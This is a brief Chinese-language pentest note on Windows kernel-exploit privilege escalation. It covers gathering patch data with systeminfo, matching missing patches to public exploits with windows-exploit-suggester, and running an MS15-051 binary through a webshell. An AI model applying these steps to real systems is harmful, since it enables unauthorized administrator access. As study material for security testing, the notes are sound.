EXP提權
EXP提權適合補丁未打全的系統
如果補丁打全了,考慮中間件提權
補充:
本地提權:需要交互式的shell,即需要遠程登錄服務器后運行提權
遠程提權:無需交互
收集補丁信息
systeminfo
搜索適合的EXP
secwiki的exp匯總
https://github.com/SecWiki/windows-kernel-exploits
零組的exp匯總
http://www.0-sec.org/提權EXP/Win/2.html
在線匹配EXP
http://blog.neargle.com/win-powerup-exp-index/#
零組輔助腳本匹配EXP
http://www.0-sec.org/提權EXP/Win/1.html
https://github.com/ianxtianxt/win-exp-
- systeminfo信息輸出至文本中
systeminfo >> systeminfo.txt
down下本機
2. 腳本匹配
注意先更新數據
python2 windows-exploit-suggester.py --update
數據與sys信息匹配
python2 windows-exploit-suggester.py --database 2020-03-10-mssb.xls --systeminfo systeminfo.txt
EXP序列號及地址皆已給出
提權實驗
MS15-051
-
上傳合適的exe
-
提權
webshell運行ms15-051x64.exe "whoami"